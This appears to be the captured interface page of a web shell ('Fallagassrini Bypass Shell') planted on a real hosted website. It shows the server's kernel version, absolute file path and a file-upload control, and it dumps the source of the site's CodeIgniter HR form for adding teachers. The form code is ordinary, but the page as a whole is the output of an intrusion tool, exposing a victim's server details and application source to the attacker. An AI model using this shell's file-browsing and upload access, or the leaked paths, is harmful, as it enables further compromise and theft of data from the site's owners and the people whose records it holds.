? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/futuredraft/application/views/hr/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/futuredraft/application/views/hr/add_teacher.php

<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>
<script type="text/javascript">
 function get_course_subject(course_id,divid)
 {
        var tr_index= $('#'+divid).closest('tr').index(); 
        
        $('#subject_id'+tr_index).load("<?= site_url() ?>/hr/get_course_subject/"+course_id); 
 }
</script>
<div class="icons_main">
   <div  class="icons">
        <img src="<?=base_url()?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('hr','viewinhrsearch','search_teachers','view_teacher','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
     <div class="icons_caption">
        <h4>Creating New Teacher</h4>
     </div>
</div>
<?php
        $department=$this->mastermodel->getdatas('department','department_id','asc','department_id');
        $designation=$this->mastermodel->getdatas('designation','designation_id','asc','designation_id');
        $grade=$this->mastermodel->getdatas('grade','grade_id','asc','grade_id');
        $status=$this->mastermodel->getdatas('status','status_id');
        $branch=$this->mastermodel->getdatas('branch','branch_id');
        $emploee=$this->mastermodel->getdatas('employee','employee_id','asc','employee_id');
        $teacher_no = $this->mastermodel->get_teacher_number();
        $subject = $this->mastermodel->getdatas('subject', 'subject_id');
        $course = $this->mastermodel->getdatas('course', 'course_id');
        $attributes = array('id' => 'validateform', 'class' => 'validate');
        echo form_open('hr/addinhr/insert_teacher/view_teacher/1',$attributes);
?>
<div class="grid_6">
    <div class="box">
        <div class="header main">Personal Details </div>
        <div class="content no-padding">
            <div class="section _100">
                <label>Teacher No</label>
                <div class="single_page">
                      <?php
                  $data = array(
                  'name'        => 'teacher_no',
                  'id'          => 'teacher_no',
                  'class'       =>'required',
                  'value'       => $teacher_no,
                  'readonly'    => true
                  );
                  echo form_input($data).form_error($data);
             ?>
                </div>
            </div>
             <div class="section _100">
                 <label>Employee Name</label>
                <div>
                        <input name="employee_name" id="employee_name" class="required" type="text" />
                </div>
            </div>         
            <div class="section _100">
                <label>Gender</label>
                <div>
                    <select name="gender" class="required chzn-done" >
                        <option value="">--Select--</option>
                        <option value="Male">Male</option>
                        <option value="Female">Female</option>
                    </select>
                </div>
            </div>

            <div class="section _100">
                <label>Date of Birth </label>
                <div>
                    <input id="dob" type="dateonly" class="required" name="dob" />
                </div>
            </div>
             <div class="section _100">
                <label>Passport No</label>
                <div>
                        <input name="passport_no" id="passport_no"  type="text" class="required" />
                </div>
            </div>
             
            <div class="section _100">
                <label>Employee Device No</label>
                <div>
                   <?php
                      $data = array(
                      'name'        => 'device_no',
                      'id'          => 'device_no',
                      'onchange'    => "checkexistence('employee','device_no',this.value)"
                      );
                      echo form_input($data).form_error($data);
                 ?>
                </div>
            </div>
             <div class="section _100">
                <label> Qatar ID No</label>
                <div>
                    <input type="text" name="employee_qatar_id_no" id="employee_qatar_id_no" class="required">
                </div>
            </div>
            <div class="section _100">
                <label>Date of Joining </label>
                <div>
                    <input id="date_of_join" type="dateonly" class="required" name="date_of_join" />
                </div>
            </div>
            <div class="section _100">
                <label>Date of Relieving </label>
                <div>
                    <input id="relieving_date" type="dateonly"  name="relieving_date" />
                </div>
            </div>
        </div>
    </div>
</div>
    
                     <?php
                   
                ?>
<div class="grid_6">
        <div class="box">
            <div class="header main">Employee Details</div>
            <div class="content no-padding">   
                <div class="section _100">
                    <label>Branch</label>
                    <div style="margin:10px 1px;">
                        <select name="employee_branch_id" id="employee_branch_id" class="required">
                            <option value="">Select</option>
                            <?php
                                foreach($branch as $list)
                                {
                            ?>
                            <option value="<?=$list['branch_id'];?>"><?=$list['branch_name'];?></option>
                            <?php
                                }
                            ?>
                    </select>
                    </div>
                  </div>
                

                  <div class="section _100">
                    <label>Designation</label>
                    <div style="margin:10px 1px;">
                        <select name="employee_designation_id" id="employee_designation_id" class="required chzn-done" >
                        <option value="">Select</option>
                        <?php

                        foreach($designation as $desg)
                        {
                            echo "<option value='". $desg['designation_id'] . "' >" . $desg['designation_name']. "</option>";
                        }
                        ?>
                    </select>
                    </div>
                  </div>
                    <div class="section _100">
                     <label>Department</label>
                    <div style="margin:10px 1px;">
                        <?
                        ?>
                             <select name="employee_department_id" id="employee_department_id" class="required chzn-done" >
                        <option value="">Select</option>
                        <?php
                        
                        foreach($department as $depart)
                        {
                            echo "<option value='". $depart['department_id'] . "' >" . $depart['department_name']. "</option>";
                        }
                        ?>
                    </select>
                    </div>
                    

                    </div>

                <div class="section _100">
                    <label>Grade</label>
                   <div style="margin:10px 1px;">
                             <select name="employee_grade_id" id="employee_grade_id" class="required chzn-done" >
                        <option value="">Select</option>
                        <?php

                    
                        foreach($grade as $grad)
                        {
                            echo "<option value='". $grad['grade_id'] . "' >" . $grad['grade_name']. "</option>";
                        }
                        ?>
                    </select>
                    </div>
                  </div>
                <div class="section _100">
                    
               
                    <label>Status</label>
                    <div style="margin:10px 1px;">
                             <select name="employee_status_id" id="employee_status_id" class="required chzn-done" >
                             <option value="">Select</option>     
                       <?php
                    foreach($status as $list)
                    {
                ?>
                <option value="<?=$list['status_id'];?>"><?=$list['status_name'];?></option>
                <?php
                    }
                ?>
                    </select>
                    </div>
                  </div>
                
                <div class="section _100">
                    <label>Reporting To</label>
                    <div style="margin:10px 1px;">
                        <select name="employee_reporting_to" id="employee_reporting_to"  >
                        <option value="">Select</option>
                        <?php

                        foreach($emploee as $emp)
                        {
                            echo "<option value='". $emp['employee_id'] . "' >" . $emp['employee_name']. "</option>";
                        }
                        ?>
                    </select>
                    </div>
                  </div>
                
            </div>
        </div>
    </div>

<div class="grid_6">
        <div class="box">
            <div class="header main">Address Details</div>
            <div class="content no-padding">
                <div class="section _100">
                    <label>Contact No</label>
                    <div>
                            <input type="text" name="contact_no" id="contact_no" class="required" />            
                    </div>
                </div>                
                <div class="section _100">
                    <label>Mobile No</label>
                    <div>
                            <input type="text" name="mobile_no" id="mobile_no" class="" />       
                    </div>
                </div>
                <div class="section _100">
                    <label>Email ID</label>
                    <div>
                            <input type="text" name="email" id="email" />         
                    </div>
                </div>
            </div>
        </div>
   </div>
<div class="clear"></div>
 <div class="grid_12">
        <div class="box">
            <div class="content no-padding">     
            <div class="header main"> Teacher Subjects</div>
                <table class="table">
                   <tr>
                       <th>Course</th>
                        <th>subject</th>
                        
                        <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
                    </tr>
                    <tr>
                        <td>
                            <select name="course_id" id="course_id" class="chzn-done" onchange="get_course_subject(this.value,this.id)">
                                <option value=''>Select</option>
                                 <?php
                                 foreach($course as $list)
                                 {
                                 ?>
                                    <option value="<?=$list['course_id']?>"><?=$list['course_name']?></option>
                                    <?php
                                 }
                                 ?>
                            </select>
                            
                        </td>
                        <td>
                            <select name="subject_id" id="subject_id" class="chzn-done" >
                               <option>Select</option>
                            </select>
                        </td>
                        
                        <td>
                        <img style="float: right; vertical-align: top;"src="<?=base_url()?>assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                        </td>
                    </tr>
                </table>
            </div>
        </div>
    </div> 

 
 

   

    <div class="grid_12">
        <div class="box">
            <div class="content no-padding">     
            <div class="header main">  Educational Qualification</div>
                <table class="table">
                   <tr>
                        <th>Course</th>
                        <th>University</th>
                        <th>Year of Passing</th>
                        <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
                    </tr>
                    <tr>
                        <td><input class="w_90" type="text" name="course" id="course"/></td>
                        <td><input class="w_90" type="text" name="university" id="university"/></td>
                        <td>
                            <input class="w_90" type="text" name="passing_year" id="passing_year"/>
                        </td>
                        <td>
                        <img style="float: right; vertical-align: top;"src="<?=base_url()?>assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                        </td>
                    </tr>
                </table>
            </div>
        </div>
    </div>


    <div class="grid_12">
        <div class="box">
         <div class="content no-padding">     
            <div class="header main">Work Experiance Details</div>
                <table class="table">
                   <tr>
                        <th>Employer</th>
                        <th>Designation</th>
                        <th>Period</th>
                        <th><input type="button" id="button2" value="Add More" class="addRow" title="Add Row" style="width:75px;"/></th>
                    </tr>
                    <tr>
                        <td><input class="w_90" type="text" name="employer" id="employer"/></td>
                        <td><input class="w_90" type="text" name="designation" id="designation"/></td>
                        <td><input class="w_90" type="text" name="period" id="period"/></td>
                        <td>
                        <img style="float: right; vertical-align: top;"src="<?=base_url()?>assets/images/icons/close.png" alt="Delete Row" class="delRow clickimage" title="Delete Row"/>
                        </td>
                    </tr>
                </table>
            </div>
        </div>
    </div> 
<div class="grid_12">
    <div class="box">
        <div class="actions">
                 <div class="actions-left">
                        <input type="reset">
                        

                 </div>
                 <div class="actions-right">
                            <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Save</button>
                 </div>
        </div>
    </div>
</div>

<?php echo form_close();?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net